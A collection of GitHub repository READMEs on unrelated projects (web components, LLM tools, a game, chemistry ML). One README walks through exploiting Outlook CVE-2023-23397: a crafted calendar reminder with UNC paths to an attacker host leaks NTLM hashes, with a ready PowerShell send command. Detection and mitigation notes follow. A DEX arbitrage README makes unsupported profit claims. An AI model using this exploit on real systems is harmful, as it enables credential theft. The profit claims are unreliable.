Do Today") - [Project Fugu](https://www.chromium.org/teams/web-capabilities-fugu/ "Web Capabilities (Project Fugu 🐡)") ## State Management State Management is one of the strongest reasons people keep referring to frameworks, but if you look at what people then use, it's a lot of Redux and other libraries, which are combined with their favorite frameworks, sometimes even packaged, but libraries they are.The same libraries and approaches can be combined with Web Components and Lit!- [Using Redux in a LitElement app | Vaadin](https://vaadin.com/blog/using-redux-in-a-litelement-app "Using Redux in a LitElement app | Vaadin") - [GitHub - gitaarik/lit-state: Simple shared app state management for LitElement.](https://github.com/gitaarik/lit-state "GitHub - gitaarik/lit-state: Simple shared app state management for LitElement.") - [Valtio, makes proxy-state simple for React and Vanilla](https://valtio.pmnd.rs/ "Valtio, makes proxy-state simple for React and Vanilla") - [State Management in Javascript Using Proxy | by Greedy Goblin Games | Medium](https://medium.com/@cjhazard.1/state-management-in-javascript-using-proxy-39f9a87cf0a1) - [gitaarik/lit-state: Simple shared app state management for LitElement. (github.com)](https://github.com/gitaarik/lit-state) - [MobX](https://mobx.js.org/ "MobX") - *Simple, scalable state management.* - [The Mediator Pattern in JavaScript — JSManifest](https://jsmanifest.com/the-mediator-pattern-in-javascript/) - [Zustand](https://docs.pmnd.rs/zustand "Zustand Documentation") - [Web Components Context Protocol implementation](https://lit.dev/docs/data/context/) ## Routing When not using a framework, routing is not provided as a ready-to-use component. Using browser-native functionality isn't complex (using [History](https://developer.mozilla.org/en-US/docs/Web/API/History_API/Working_with_the_History_API "Working with the History API - Web APIs | MDN")), and lately, the new URLPattern API allows you to do any kind of routing, including complex parameter passing, natively. The Lit PWA (see my [previously mentioned article](<https://The Browser is your Framework: Building a PWA with only Web Components and Lit>)) uses it, including lazy-loading polyfills if needed.- [URLPattern brings routing to the web platform - Chrome Developers](https://developer.chrome.com/articles/urlpattern/ "URLPattern brings routing to the web platform - Chrome Developers")Other router solutions:- [Polymer/pwa-helpers: Small helper methods or mixins to help you build web apps. (github.com)](https://github.com/Polymer/pwa-helpers) - [tuwrraphael/route-it: dead simple vanilla js spa router (github.com)](https://github.com/tuwrraphael/route-it) - [A SPA/PWA Router in Pure Vanilla ES6 JavaScript | by Marc van Neerven | JavaScript in Plain English](https://javascript.plainenglish.io/a-spa-pwa-router-in-pure-vanilla-es6-javascript-e8f79cfd0111) # Using Web Components in Frameworks When you do decide to work with your favorite framework, Web Components can still be a valid choice for everything UI, because you will be able to reuse the components across projects with differing frameworks, and they will work regardless of framework upgrades or switching to other frameworks. This is why many companies, such as Google, Adobe, RedHat, Microsoft, Cisco, SAP and VMWare are already investing heavily in Web Components. ## Generic information on Web Components in frameworks: - [Create Web Components by using Google Lit, publish them on Npm and use them in React, Angular & JS projects - DEV Community 👩‍💻👨‍💻](https://dev.to/fabiobiondi/create-web-components-by-using-google-lit-publish-them-on-npm-and-use-them-in-react-angular-js-projects-3676) - [Pairing Web Components with JS frameworks - Ionic](https://ionic.io/resources/articles/building-design-systems-with-web-components#h-pairing-web-components-with-js-frameworks) - [Custom Elements Everywhere](https://custom-elements-everywhere.com/ "Custom Elements Everywhere")\ *An overview of Web Component readiness in the popular frameworks* ## React - [Lit for React Developers (google.com)](https://codelabs.developers.google.com/codelabs/lit-2-for-react-devs#0)\ *E-learning to move from React to Lit* - [How To Use Web Components in React](https://blog.devgenius.io/how-to-use-web-components-in-react-54c951399bfd#:~:text=How%20To%20Use%20Web%20Components%20in%20React%201,Component%20in%20React%20...%205%20Final%20Thoughts%20 "How To Use Web Components in React") - [Creating and using Web Components in React](https://www.youtube.com/watch?v=PUGDzA1uP-Y) - [React hooks reimplemented for Web Components - GitHub](https://github.com/matthewp/haunted) ## Angular - [How To Use Web Components in Angular](https://levelup.gitconnected.com/how-to-use-web-components-in-angular-c5d1d7825ca0 "How To Use Web Components in Angular") - [Using Web Components in Angular Forms with Element Internals - Angular 16 | 15](https://coryrylan.com/blog/using-web-components-in-angular-forms-with-element-internals "Using Web Components in Angular Forms with Element Internals - Angular 16 | 15") - [How to integrate Web Components using Lit in Angular - This Dot Labs](https://www.thisdot.co/blog/how-to-integrate-web-components-using-lit-in-angular "How to integrate Web Components using Lit in Angular - This Dot Labs") - [Master Web Component Forms Integration - with Lit and Angular](https://www.thinktecture.com/en/web-components/web-component-forms-integration-with-lit-and-angular/ "Master Web Component Forms Integration - with Lit and Angular") - <https://stackoverflow.com/questions/56837900/how-to-import-angular-web-component-in-another-angular-app> - [Using Web Components in Angular](https://www.youtube.com/watch?v=2Wjp_FsWOXU) ## Vue - [How to Create Reusable Web Components with Lit and Vue](https://dval.dev/blog/lit-web-components-tutorial/ "dval.dev") - [How to use Web Components in Vue](https://www.youtube.com/watch?v=gp-1LzhSH30) --- This list is maintained by [Marc van Neerven](https://www.linkedin.com/in/mvneerven/)<br>
12
0
fynnfluegge/gitreview-gpt
https://github.com/fynnfluegge/gitreview-gpt
A CLI tool that reviews your git changes with GPT-3.5
# gitreview-gpt `gitreview-gpt` reviews your git changes with OpenAI's GPT-3.5 model from command line and provides detailed review comments with the corresponding line numbers. Your `git diff` is extensively parsed to a well comprehensible format for the `gpt-3.5-turbo` completion api to get precise feedback based on your code changes. ![ezgif-5-956a1609ab](https://github.com/fynnfluegge/gitreview-gpt/assets/16321871/ce68fb34-2748-4929-aaaa-b2a1271301a5) ## ✨ Features - **Get feedback and suggestions with the corresponding line numbers to git changes** - **Reviews all changes in the working directory** - **Reviews only staged changes** - **Reviews all committed changes against a specific branch** - **Reviews all modified files at once or separately** - **Creates a commit message for your changes** ## 🚀 Usage - `rgpt review`: Reviews all changes in your working directory. - `rgpt review --staged`: Reviews all staged changes in your working directory. - `rgpt review --target $BRANCH`: Reviews all committed changes in your current branch compared to `$BRANCH`. - `rgpt commit`: Creates a commit message for your staged changes. ## 📋 Requirements - Python >= 3.8 ## 🔧 Installation Create your personal OpenAI Api key and add it as `$OPENAI_API_KEY` to your environment with: ``` export OPENAI_API_KEY=<YOUR_API_KEY> ``` Install with `pipx`: ``` pipx install gitreview-gpt ``` > [!NOTE] > It is recommended to use `pipx` for installation, nonetheless it is also possible to use `pip`
11
0
Muhammad-Ali007/OutlookNTLM_CVE-2023-23397
https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397
null
To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attacker's machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called "PidLidReminderFileParameter". To ensure that the audio we embed in our malicious email will take precedence over the victim's default reminder configurations, we will also need to set another parameter called "PidLidReminderOverride" to true. To set up the "PidLidReminderFileParameter" property to point to a network share, the attacker can specify a Universal Naming Convention (UNC) path instead of a local file. UNC is used in Windows operating systems to find network resources (files, printers, shared documents). These paths consist of a double backslash, the IP address or name of the computer hosting the resource, the share name and the file name. For example: \\ATTACKER_IP\foo\bar.wav When the victim receives the malicious email, the UNC path directs them to that SMB share, triggering the vulnerability. This causes the system to start an NTLM authentication process against the attacker's machine, leaking a Net-NTLMv2 hash that the attacker can later try to crack. If for some reason the SMB protocol isn't a viable alternative to use, non-server versions of Windows will accept using UNC paths pointing to ports 80 or 443, and use HTTP to retrieve the file from a WebDAV-enabled web server. The syntax of such UNC path is as follows: \\ATTACKER_IP@80\foo\bar.wav OR \\ATTACKER_IP@443\foo\bar.wav This may be useful to bypass firewall restrictions preventing outgoing connections to port 445 (SMB). Attack Phase Let's craft a malicious email containing an appointment with the required parameters to trigger it. Setting up Responder: Since we expect the victim to trigger an authentication attempt against the attacker on port 445, we will set up Responder to handle the authentication process and capture the NetNTLM hash for us. If you are unfamiliar with Responder, it will simply emulate an SMB server and capture any authentication attempt against it. responder -I <interface> Attempting to Handcraft a Malicious Appointment: - As a first attempt, we could manually create an appointment and edit the path to the reminder's sound file to point to a shared folder. To create an appointment, you will first need to click on the calendar and then on the New Appointment button. - We will create an appointment that includes a reminder set in 0 minutes so that it triggers right after the victim receives it. We will also click on the Sound option to configure the reminder's sound file. - We can try setting the sound file path to a UNC path that points to the Attacker's machine. However, Outlook will silently ignore the UNC path and revert to using the default WAV file, which can be confirmed by going back to the Sound dialogue(if it isn't replaced, we can move further from here or we will need to install OutlookSpy plugin to aid us otherwise). OutlookSpy: Even if Outlook cannot set the reminder's sound file to a UNC path, we can use the OutlookSpy plugin to achieve this. This plugin will allow you to access all of Outlook's internal parameters directly, including the reminder's sound file. You will need to install it manually before proceeding. Be sure to close Outlook before running the installer. - To view our current appointment from OutlookSpy, click the OutlookSpy tab. Be sure to click the "CurrentItem" button from within the appointment, or you might modify different Outlook components. - From this window, you can see the parameters associated with the appointment's reminder. We want to set the "ReminderSoundFile" parameter to the UNC path that points to Attacker's machine and set both the "ReminderOverrideDefault" and "ReminderPlaySound" to true. Just for reference, here's what each parameter does: ReminderPlaySound: boolean value that indicates if a sound will be played with the reminder. ReminderOverrideDefault: boolean value that indicates the receiving Outlook client to play the sound pointed by ReminderSoundFile, instead of the default one. ReminderSoundFile: string with the path to the sound file to be used. For our exploit, this will point to a bogus shared folder in attacker's machine. We can use the script tab and the following script to change the parameters to the required values: AppointmentItem.ReminderOverrideDefault = true AppointmentItem.ReminderPlaySound = true AppointmentItem.ReminderSoundFile = "\\<attacker's IP>\<share_folder>\file.wav" Be sure to click the "Run" button for the changes to be applied. You can go back to the "Properties" tab to check that the values were correctly changed. Finally, save your appointment to add it to your calendar, making sure the reminder is set to "0 minutes" and that the appointment matches the current time and date, as we want it to trigger immediately. If all went as expected, you should immediately see a reminder popping up. And you should receive the authentication attempt in your Responder console on the attacker's machine. Weaponisation Summarising the steps required to exploit the vulnerability, an attacker would need to: - Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker's machine. - Send the invite to the victim via email. - Wait for the reminder to trigger a connection against the attacker's machine. - Capture the Net-NTLMv2 hash, use authentication relaying, or profit in any other way. Steps 3 and 4 are already covered for us by Responder, but handcrafting the malicious appointment by hand is a bit tedious. Luckily, a couple of exploits are readily available for us to create and send a malicious appointment, one of which is provide in this repository. This Powershell exploit leverages Outlook's COM objects to build emails and appointments easily. It contains a couple of functions that we can use: Save-CalendarNTLMLeak: This function creates a malicious appointment and saves it to your own calendar. Useful for testing purposes. Send-CalendarNTLMLeak: This function creates a malicious appointment and sends it via email to a victim. The email invitation will be sent from your Outlook's current default account. Using the Exploit: Within powershell, you can import the exploit's functions with the "Import-Module" cmdlet. After that, both functions will be available in your current Powershell. To send an email with a malicious appointment, you can just run the following command: PS C:\Users\User\Desktop\> Import-Module .\CVE-2023-23397.ps1 PS C:\Users\User\Desktop\> Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\ATTACKER_IP\foo\bar.wav" -meetingsubject "Random Meeting" -meetingbody "This is just a regular meeting invitation." Since the exploit makes use of the current Outlook instance to send the email, you will likely get a couple of alerts asking you to grant permission to the script to send emails on your behalf. Make sure to press Allow as many times as needed. Marking the "Allow access for 10 minutes" checkbox should also help speed this process up. Detection and Mitigation Detection: Now that we have gone through the steps to weaponize the CVE-2023-23397 attack on Outlook, let's talk about a few ways to detect this attack within the network. Each attack leaves patterns or artifacts that could help the detection team identify the threats. It all depends on the network visibility and the log sources that are being collected and providing the much important visibility. Sigma Rules: The appended Sigma rule detects Outlook initiating a connection to a WebDav or SMB share, indicating a post-exploitation phase. This Sigma Rule looks to detect "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie, which indicates a post-exploitation/exfiltration phase. These SIGMA rules can be converted into the detection and monitoring tool to hunt for suspicious log activity within the network. Yara Rule: YARA rule looks for the pattern within the files on disk. The appended community YARA rules can be used to detect the suspicious MSG file on the disk with two properties discussed in the above tasks. Microsoft has released a PowerShell script "CVE-2023-23397.ps1" that will check the Exchange messaging items like Mail, calendar, and tasks to see if the IOCs related to the CVE-2023-23397 attack are found. The script can be used to audit and clean the detected items. Mitigation: This vulnerability is being exploited extensively in the wild. Some of the recommended steps as recommended by Microsoft in order to mitigate and avoid this attack are: - Add users to the Protected Users Security Group, which prevents using NTLM as an authentication mechanism. - Block TCP 445/SMB outbound from your network to avoid any post-exploitation connection. - Use the PowerShell script released by Microsoft to scan against the Exchange server to detect any attack attempt. - Disable WebClient service to avoid webdav connection.
19
1
FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract
https://github.com/FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract
Discover the secret to trading success with our game-changing solidity smart contract. Execute Triangular Arbitrage on DEX's effortlessly, leveraging its open-source nature and profitability. It's time to level up your trading journey! Get started today!
<img src="banner.png" /> What Is DEX Crypto Triangular Arbitrage? Triangular arbitrage is the result of a discrepancy between three tokens that occurs when the DEX exchange rates do not exactly match up. if you dont have metamask browser extension by getting it here https://metamask.io/download/ and make sure you configure metamask for the network your want to use for ETH: configure by Default for BNB: https://academy.binance.com/en/articles/connecting-metamask-to-binance-smart-chain for polygon: https://www.coindesk.com/learn/how-to-connect-metamask-to-the-polygon-network/ Step 1. Goto https://remix.ethereum.org Step 2. Make a New File name it myContract.sol <img src="1.png" /> Step 3. copy and paste the this code https://github.com/FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract/blob/main/DEX-Triangular-Arbitrage.sol in to the new file <img src="2.png" /> Step 4. compile the new file "if you get a Green checkmark every thing complied correctly" <img src="3.png" /> Step 5. Appoved remix to connect to MetaMask "Will only ask if you never connected to remix before" , Set Environment to "Injected Provider - MetaMask" and deploy <img src="4.png" /> Step 6. For the polygon netwrok you need to change the priorty fee , for ETH and BNB you should not need to do that in less the contract deployment fails <img src="5.png" /> <img src="6.png" /> <img src="7.png" /> <img src="8.png" /> <img src="9.png" /> Step 9. Copy your contract address <img src="10.png" /> Step 10. Scan your contract address in a block scanner for ETH etherscan.io , BNB bscscan.com , Polygon polygonscan.com <img src="11.png" /> Step 11. Fund your contract <img src="12.png" /> Step 12. Scan your contract address in a block scanner if the transcation is completed <img src="13.png" /> Step 13. Start your Contract <img src="14.png" /> <img src="15.png" /> <img src="16.png" /> Step 12. Scan your contract address in a block scanner to see if all went well "if it say failed if it does read the error to find out way , most of the time it has to do with the contract being under funded" <img src="17.png" /> This repository contains a Solidity smart contract that enables decentralized exchange (DEX) triangular arbitrage on the Ethereum blockchain. With this contract, developers can automate and execute profitable triangular arbitrage strategies across different tokens listed on decentralized exchanges. Features: Triangular Arbitrage Logic: The smart contract includes the logic to calculate optimal trade amounts and execute trades across the DEX. Trustless and Decentralized: The contract operates on the Ethereum blockchain, eliminating the need for intermediaries and ensuring a secure and transparent arbitrage process. Profit Calculation: The contract calculates the profit obtained from the arbitrage by comparing token balances before and after the trades. Gas Optimization: The contract is designed with gas optimization in mind to minimize transaction costs and maximize profitability. Easy Integration: The contract is written in Solidity, the popular programming language for Ethereum smart contracts, making it easy to integrate into existing decentralized applications (dApps) or develop new ones. #defi #digitalcurrency #cryptoconsultancy #cryptosignals #cryptos #cryptotrading #bitcoinmining #cryptoanalyst #cryptonetwork #cryptotrader
21
21
lilujunai/EMQ-series
https://github.com/lilujunai/EMQ-series
[ICCV-2023] EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization
# EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization (ICCV2023) This repository contains all the experiments of our paper "EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization". Final implementations in preparation. ![emq_primitives](emq_primitives.png) ## Acknowledgements This repo is based on the following repos, thank the authors a lot. - [BRECQ: Pushing the Limit of Post-Training Quantization by Block Reconstruction (ICLR 2021)](https://arxiv.org/abs/2102.05426) - [OMPQ](https://github.com/MAC-AutoML/OMPQ/tree/master) ## Citation If you find that this project helps your research, please consider citing some of the following papers: ``` @inproceedings{Dong2023EMQ, title={EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization}, author={Peijie Dong, Lujun Li, Zimian Wei, Xin Niu, ZHILIANG TIAN, Hengyue Pan}, booktitle={International Conference on Computer Vision (ICCV)}, year={2023} } ```
10
0
scaleapi/llm-engine
https://github.com/scaleapi/llm-engine
Scale LLM Engine public repository
# ⚡ LLM Engine ⚡ **The open source engine for fine-tuning and serving large language models**. Scale's LLM Engine is the easiest way to customize and serve LLMs. In LLM Engine, models can be accessed via Scale's hosted version or by using the Helm charts in this repository to run model inference and fine-tuning in your own infrastructure. ## 💻 Quick Install ```commandline pip install scale-llm-engine ``` ## 🤔 About Foundation models are emerging as the building blocks of AI. However, deploying these models to the cloud and fine-tuning them are expensive operations that require infrastructure and ML expertise. It is also difficult to maintain over time as new models are released and new techniques for both inference and fine-tuning are made available. LLM Engine is a Python library, CLI, and Helm chart that provides everything you need to serve and fine-tune foundation models, whether you use Scale's hosted infrastructure or do it in your own cloud infrastructure using Kubernetes. ### Key Features 🎁 **Ready-to-use APIs for your favorite models**: Deploy and serve open-source foundation models — including LLaMA, MPT and Falcon. Use Scale-hosted models or deploy to your own infrastructure. 🔧 **Fine-tune foundation models**: Fine-tune open-source foundation models on your own data for optimized performance. 🎙️ **Optimized Inference**: LLM Engine provides inference APIs for streaming responses and dynamically batching inputs for higher throughput and lower latency. 🤗 **Open-Source Integrations**: Deploy any [Hugging Face](https://huggingface.co/) model with a single command. ### Features Coming Soon 🐳 **K8s Installation Documentation**: We are working hard to document installation and maintenance of inference and fine-tuning functionality on your own infrastructure. For now, our documentation covers using our client libraries to access Scale's hosted infrastructure. ❄ **Fast Cold-Start Times**: To prevent GPUs from idling, LLM Engine automatically scales your model to zero when it's not in use and scales up within seconds, even for large foundation models. 💸 **Cost Optimization**: Deploy AI models cheaper than commercial ones, including cold-start and warm-down times. ## 🚀 Quick Start Navigate to [Scale Spellbook](https://spellbook.scale.com/) to first create an account, and then grab your API key on the [Settings](https://spellbook.scale.com/settings) page. Set this API key as the `SCALE_API_KEY` environment variable by adding the following line to your `.zshrc` or `.bash_profile`: ```commandline export SCALE_API_KEY="[Your API key]" ``` If you run into an "Invalid API Key" error, you may need to run the `. ~/.zshrc` command to re-read your updated `.zshrc`. With your API key set, you can now send LLM Engine requests using the Python client. Try out this starter code: ```py from llmengine import Completion response = Completion.create( model="falcon-7b-instruct", prompt="I'm opening a pancake restaurant that specializes in unique pancake shapes, colors, and flavors. List 3 quirky names I could name my restaurant.", max_new_tokens=100, temperature=0.2, ) print(response.output.text) ``` You should see a successful completion of your given prompt! _What's next?_ Visit the [LLM Engine documentation pages](https://scaleapi.github.io/llm-engine/) for more on the `Completion` and `FineTune` APIs and how to use them.
507
28
HoneyCakeTeam/Tic-Tac-Toe
https://github.com/HoneyCakeTeam/Tic-Tac-Toe
Tic Tac Toe Game is a simple online multiplayer game built with Firebase and Jetpack Compose. The game allows two players to play the classic XO (Tic-Tac-Toe) game together in real-time. The app aims to create a seamless and engaging gaming experience with a simple architecture and a focus on real-time functionality.
# Tic-Tac-Toe Game App ## Overview Tic Tac Toe Game is a simple online multiplayer game built with Firebase and Jetpack Compose. The game allows two players to play the classic XO (Tic-Tac-Toe) game together in real-time. The app aims to create a seamless and engaging gaming experience with a simple architecture and a focus on real-time functionality. ## Table of Contents - [Features](#features) - [Screenshots](#screenshots) - [How to Play](#HowtoPlay) - [Usage](#usage) - [Setup and Installation](#SetupandInstallation) - [License](#License) ## Features - Real-time XO gameplay between two players. - Simple and intuitive UI built with Jetpack Compose. - Firebase integration for real-time data synchronization. ## Screenshots <div align="center"> <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/0dbfb480-e728-4d78-bab0-23882037ca09" alt="Splash" width="200" style="border: 5px solid #ccc; border-radius: 15px;"> <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/56f481ec-ef49-4d28-801f-a062a5ddf28c" alt="Home" width="200" style="border: 5px solid #ccc; border-radius: 15px;"> <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/65321c1a-a1f8-41d9-b6a1-01fe7178674d" alt="Join Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;"> <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/3608eada-e282-42ce-a675-38e1a0198628" alt="Create Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;"> <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/b9266c15-2aba-438e-8592-e49f35263e5e" alt="Load Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;"> <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/6792d308-74d5-45de-b593-e09b3e9addcc" alt="Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;"> </div> ## How to Play 1. Launch the app on your Android device. 2. The app will connect both players in real-time to start the game. 3. The game screen will display the game board with empty cells. 4. Players take turns to place their X or O on the board by tapping on an empty cell. 5. The first player to get three of their symbols in a row (horizontally, vertically, or diagonally) wins the game. 6. If all cells are filled and there is no winner, the game ends in a draw. 7. After each game, players have the option to start a new game and play again. ## Usage - Firebase Realtime Database for real-time data synchronization. - Jetpack Compose for building the user interface. - Kotlin for the Android application development. ## Setup and Installation 1. Clone the repository to your local machine. 2. Open the project in Android Studio. 3. Connect the project to your Firebase project. 4. Build and run the app on an Android device or emulator. ## License This project is licensed under the HoneyTeam License, and we welcome contributions from the community. If you find a bug, have an idea for a new feature, or would like to contribute in any other way, please don't hesitate to submit a GitHub issue or pull request. Enjoy playing XO with your friends online! 🎮
10
2
Novartis/pqsar2cpd
https://github.com/Novartis/pqsar2cpd
pqsar2cpd is a deep learning algorithm for translation of activity profiles into novel molecules.
# pqsar2cpd - de novo generation of hit-like molecules from pQSAR pIC50 with AI-based generative chemistry [![python](https://img.shields.io/badge/Python-3.8-3776AB.svg?style=flat&logo=python&logoColor=white)](https://www.python.org) [![tensorflow](https://img.shields.io/badge/TensorFlow-2.8-FF6F00.svg?style=flat&logo=tensorflow)](https://www.tensorflow.org) [![LICENSE](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/Novartis/pqsar2cpd/blob/main/LICENSE) This repository contains the code of the conditional generative adversarial network capable of translating [pQSAR](https://github.com/Novartis/pQSAR) profiles of pIC50 values into novel chemical structures, as described in [[1]](https://www.biorxiv.org/content/10.1101/2021.12.10.472084v1) The model itself operates entirely in the latent space. This means users can use any external molecular encoder/decoder to encode the molecules into vectors for training, and decode the output back to SMILES after inference. This way, pqsar2cpd can be implemented into any existing pipeline seamlessly. We have succesfully tested the approach with [CDDD](https://github.com/jrwnter/cddd), [JT-VAE](https://github.com/wengong-jin/icml18-jtnn), [HierVAE](https://github.com/wengong-jin/hgraph2graph), and [MoLeR](https://github.com/microsoft/molecule-generation). Since the model is input-agnostic, other property profiles, such as gene expression profiles or protein embeddings, could potentially be used instead of pQSAR to generate novel compounds. ## Requirements pqsar2cpd is implemented in Tensorflow. To make sure all your packages are compatible, you can install the dependencies using the provided requirements file: ``` pip install -r requirements.txt ``` ## Training To train a new model, you need a set of compound vectors coming from a molecular encoder, and a matching set of property profiles. The compound and profile sets should be separate numpy arrays containing n-dimensional vectors, one row per compound, with 1:1 correspondence in indexing. If you're interested in using pQSAR profiles, you can follow the instructions in the [pQSAR](https://github.com/Novartis/pQSAR) repository. To use the model out of the box, save the compounds and profiles as separate .npy files with NumPy. To train the model, run: ``` python train.py --compounds='cpd.npy' --profiles='profiles.npy' ``` you can also specify an optional argument for the number of epochs, e.g. `--epochs=400`. The script will train the cGAN, and save the generator as pqsar2cpd.h5, which will be ready for use in inference. ## Inference To generate novel molecules out of a set of profiles, run: ``` python predict.py --model='pqsar2cpd.h5' --profiles='test.npy' --output='new_mols.h5' --n_samples=100 ``` This will load the profile numpy array from `test.npy` and will generate 100 samples for each of the profiles in the set. Then, the results will be saved in `new_mols.h5` in hdf5 format, with the samples stored as a dataset with the profile index as key. These can now be passed to the molecular decoder to get the SMILES. ## Contact Code authored by [Michal Pikusa](mailto:[email protected]) Contributions: **Florian Nigsch**, **W. Armand Guiguemde**, Eric Martin, William J. Godinez, Christian Kolter ## References ``` [1] De-novo generation of novel phenotypically active molecules for Chagas disease from biological signatures using AI-driven generative chemistry Michal Pikusa, Olivier René, Sarah Williams, Yen-Liang Chen, Eric Martin, William J. Godinez, Srinivasa P S Rao, W. Armand Guiguemde, Florian Nigsch bioRxiv 2021.12.10.472084; doi: https://doi.org/10.1101/2021.12.10.472084 `````
25
5
meistrari/prompts-royale
https://github.com/meistrari/prompts-royale
Automatically create prompts and make them fight each other to know which is the best
# Prompts Royale Prompt engineering is an extremely iterative process. Even when we manage to settle down on a prompt, it's so difficult to test it against test cases and other possible prompts to make sure we're giving the best instructions to the model. **Prompts Royale** is an application that allows you to really easily create many prompt candidates, write your own ones, and make them battle until a clear winner emerges. It makes the process of iterating on a prompt feel much more easy and reliable. You give a description of what you want to accomplish, give it a few scenarios and expected outputs, and then just sit back and watch them battle for #1. <div align=center> https://github.com/meistrari/prompts-royale/assets/8951736/efd6e6f6-c470-473a-bcb3-33a398882c9f </div> ## What it can do - **Automatic prompt generation:** Allows for the creation of prompt candidates from the user's description and test case scenarios. The user can also input their own. - **Automatic test cases generation:** Enables automatically creating test cases from the description to get the juices flowing! - **Monte Carlo Matchmaking + ELO Rating:** It uses the Monte Carlo method for matchmaking to ensure you get as much information with the least amount of battles, and ELO Rating to properly rank candidates based on their wins and who they win against - **Everything is customizable:** The settings page allow you to tinker with every single parameter of the application - **Local & Secure**: Everything is stored locally and requests are made from your browser to the LLMs API. ## Usage You can use it at [promptsroyale.com](https://promptsroyale.com/), or you can clone the repository and run it locally. Requirements: - [Node](https://nodejs.org/en) v16+ Clone the repository: ```bash git clone [email protected]:meistrari/prompts-royale.git ``` Install the dependencies. We're using [Bun](https://bun.sh) for managing dependencies, it's awesome. ```bash bun i ``` Run the server: ```bash bun run dev ``` ## Example Here's an example of what a use case would look like: #### Description ``` Write a prompt that creates a headline for a website. ``` #### Example 1 **Scenario** > Website of a car dealership **Expected Output** > Find the car of your dreams at the best price #### Example 2 **Scenario** > Website of a SaaS for data analytics **Expected Output** > Your data, your insights, your way #### Example 3 **Scenario** > Website for a zoo **Expected Output** > Animals of the world, in one place With the information of the task to be accomplished and the test cases, the user can then **Generate prompt candidates**, that take those into account and outputs **N** candidates that will be ranked by the system through a combat system. The user can also write the prompt candidates themselves if they have a specific idea of what they want. If you have something specific in mind, writing your prompts is always the best option to fit what you intend. <details> <summary><strong>Click to see an example of the generated prompts</strong></summary> **Prompt A** > Design a compelling headline for a distinct category of website. Understand the website's mission, its intended audience, and the solutions it provides. The headline should attract attention, be pertinent, and distill the website's core concept into a succinct statement. Leverage your linguistic proficiency, promotional tactics, and domain-specific knowledge to create an enticing headline." **Prompt B** > Your directive is to formulate an attractive headline for a specific kind of website. Pay attention to the website's objectives, its targeted demographics, and the services it offers. The headline should be captivating, germane, and capable of summarizing the website's primary proposition in a brief line. Use your language comprehension, advertising strategies, and industry-specific insights to create a compelling headline. </details> ## How It Works Each prompt is represented as a normal distribution with an initial mean $\mu$ of $1000$ and a standard deviation $\sigma$ of $350$. This distribution represents the ELO score of the prompt. We then repeat the following cycle: We use a monte carlo sampler to make duels where each of the 2 selected prompts battle each other. The chances of being drawn for the duel are proportional to the chance that that prompt is the best, or in more mathematical terms, we use the weighted distribution of their probability density to define the likelihood that that curve has the highest true mean within the group. In each duel, both prompts answer each of the test cases and a separate prompt evaluates which answer was the best. The ELO scores of the prompts are then updated according to the following formulas: $$\mu_{A}' = \mu_{A} + \frac{K}{N} \cdot (score - expected\\\_score(A,B))$$ $$\mu_{B}' = \mu_{B} + \frac{K}{N} \cdot (1 - score - expected\\\_score(B,A))$$ $$\sigma_{A}' = \sigma_{A} \cdot LR$$ $$\sigma_{B}' = \sigma_{B} \cdot LR$$ **Where:** - $LR$ is the learning rate. The lower the learning rate the faster the "learning". By decreasing the standard deviation, you make results more meaningful. This means that the system will converge faster to a winner, but it also means that it will be less likely to find the best result. We recommend $0.96$. - $K$ is the number of points each battle has at stake. - $N$ is the number of test cases - $\dfrac{K}{N}$ is the amount of points each round has at stake - If two prompts with the same $\mu$ battle and one prompt wins all of the rounds it will gain $\dfrac{K}{2}$ points and the other will lose $\dfrac{K}{2}$ points. - $score$ is $1$ if $A$ wins and $0$ if $B$ wins, - $expected\\\_score(A,B)$ is the expected chance of $A$ winning versus $B$ given their normal distributions. This is calculated by the following formula: $$expected\\\_score(A,B) = \frac{1}{1 + 10^{\frac{\mu_{B} - \mu_{A}}{400}}}$$ The reason why we update the $\sigma$ of each prompt is that we have more certainty on the distribution after each match, thus it should have a smaller standard deviation. ## Credits We were heavily inspired by https://github.com/mshumer/gpt-prompt-engineer, thanks for your work!
323
26
zinedkaloc/gpt-2-mj
https://github.com/zinedkaloc/gpt-2-mj
null
# Midjourney Prompt Generator Welcome to the ChatGPT to Midjourney Prompt Generator! This tool utilizes the power of ChatGPT, to generate engaging and creative prompts for various purposes with very simple sentences or only words. Whether you're a artist seeking inspiration, a or a game designer brainstorming game scenarios, this generator can assist you in generating midjourney prompts that will help spark your creativity. ## How to Use Using the ChatGPT to Midjourney Prompt Generator is simple: Copy following commands one by one than start generating prompts for Midjourney. ```md You are one of the smartest prompt creator in the world for generative AIs. This is how Midjourney work: Midjourney is another AI-powered tool that generates images from user prompts. MidJourney is proficient at adapting actual art styles to create an image of any combination of things the user wants. It excels at creating environments, especially fantasy and sci-fi scenes, with dramatic lighting that looks like rendered concept art from a video game. How does Midjourney work? Midjourney is an AI image generation tool that takes inputs through text prompts and parameters and uses a Machine Learning (ML) algorithm trained on a large amount of image data to produce unique images. is powered by Latent Diffusion Model (LDM), a cutting-edge text-to-image synthesis technique. Before understanding how LDMs work, let us look at what Diffusion models are and why we need LDMs. Diffusion models (DM) are transformer-based generative models that take a piece of data, for example, an image, and gradually add 